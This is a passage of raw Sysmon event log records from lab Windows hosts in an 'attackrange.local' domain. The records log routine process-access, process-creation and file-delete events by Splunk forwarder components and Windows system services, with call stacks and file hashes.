Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083833Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:58.878{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083832Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:58.878{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083831Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:58.878{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083830Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:58.878{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083829Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:58.878{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083828Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:58.878{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083827Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:58.878{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083826Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:58.878{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083825Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:58.878{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083824Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:58.878{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B56E-615A-A301-00000000FD01}356C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083823Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:58.878{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B56E-615A-A301-00000000FD01}356C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083822Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:58.879{2FDD8D40-B56E-615A-A301-00000000FD01}356C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000083821Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:58.597{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06C515DD2ABD9BC6605CE154AF48A126,SHA256=B1A581D6603DD72FDB0D44A3338EAA2A7288A89FA4BE7E2E4EACB6F3ACD888F6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108308Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:58.629{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B56E-615A-8802-00000000FC01}4752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108307Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:58.629{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108306Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:58.629{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108305Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:58.629{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108304Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:58.629{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108303Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:58.629{58E9C193-ACA4-615A-0500-00000000FC01}412964C:\Windows\system32\csrss.exe{58E9C193-B56E-615A-8802-00000000FC01}4752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108302Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:58.629{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B56E-615A-8802-00000000FC01}4752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108301Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:58.630{58E9C193-B56E-615A-8802-00000000FC01}4752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000108300Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:58.562{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C661B797060A6B32EBB47A8F3FF9F9C,SHA256=025BE6DE948D3E7F9EFD054BC2940173C220C6A413D530E539CC3DA05220D0CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083837Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:59.956{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E6AD4E80F89B5FAFB4CAA41B9DA6F650,SHA256=82FA5DF1F368BA52991EF892300DE16F132FA16D1AD4DFA0FAF2D3412184579A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083836Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:59.956{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=030594F77EA7422C828D82535344551D,SHA256=906A963144917162D5059E2F216112D8BD72476B6158D03C2C3A0B88D422B9B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083835Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:59.597{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D10603BF9B85D5953631E9FEBA5D2C0,SHA256=7BDF32E3BCCF434C7E1CC1F6E8BC8FAFF3649E8029817FCBDB61818B25E9F86F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108321Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:59.581{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97932168CAEC60DF805FD18B33C75D4A,SHA256=235CBCB856ED08DD00A54C38ED038C832DFC0F61C76871621A1ADDA4EC960464,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108320Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:59.412{58E9C193-B56F-615A-8902-00000000FC01}61808352C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108319Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:59.197{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B56F-615A-8902-00000000FC01}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108318Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:59.197{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108317Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 